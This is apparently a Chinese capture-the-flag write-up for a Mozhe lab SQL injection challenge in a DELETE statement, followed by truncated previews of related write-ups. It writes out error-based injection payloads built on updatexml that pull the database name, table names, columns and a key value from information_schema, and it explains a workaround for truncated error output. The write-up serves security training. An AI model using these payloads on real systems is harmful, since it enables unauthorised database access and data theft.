墨者 SQL注入漏洞測試 delete注入

2021-09-25 02:38:05 字數 1386 閱讀 3550

測試注入 ,嘗試order by ,失敗

測試and,頁面正常回顯

試著用報錯注入,and (updatexml(1,concat(0x7e,(select database()),0x7e),1))

發現有注入點,資料庫是pikaqiu ,

在這裡提醒大家不要用id=61~65進行注入,構造乙個不存在的最好(如博主用的是23)

至於為什麼後面會講清楚,這裡有個坑

獲取表         and (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikaqiu'),0x7e),1))

爆欄位  and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='message' limit 3,1),0x7e),1))

接下來爆字段值,這裡有三個坑

2.因為報錯內容回顯只能回顯32位,而"~"佔了乙個字元,所以爆出來的key值是少1位的,知道原因後就有很多處理方法了,可以有right()方法,也可以爆出31位密碼,最後1位乙個乙個試.

3.key要用單引號括住,否則會報錯,因為key是保留字段。

具體解釋可以看:

最後給出right()方法的解決方案

很容易猜出來第一位就是m,最後拼接字元,拿到flag 

墨者 SQL注入漏洞測試 報錯盲注

根據題意,用updatexml構造報錯回顯 and updatexml 1,concat 0x7e,select user 0x7e 1 爆庫 and updatexml 1,concat 0x7e,select database 0x7e 1 爆表 and updatexml 1,concat 0...

墨者 SQL手工注入漏洞測試 Db2資料庫

進入環境,用order by測試,發現可以,並測試到字段為4 接下來用union select 1,2,3,4 發現失敗 後來上網看了別人的思路是union select 1,2,3,4 from sysibm.systables就可以回顯了 應該是不同的資料庫語法問題 爆庫 id 2 union ...

墨者靶場 初級 SQL過濾字元後手工注入漏洞測試

安全工程師 墨者 最近在練習sql手工注入漏洞,自己剛搭建好乙個靶場環境apache php mysql,php 對客戶端提交的引數做了些許過濾。來感受過濾過後的sql手工注入吧。1 掌握sql注入原理 2 了解手工注入的方法 3 了解字串的url加解密 4 了解sql注入常用注釋字元 5 了解sq...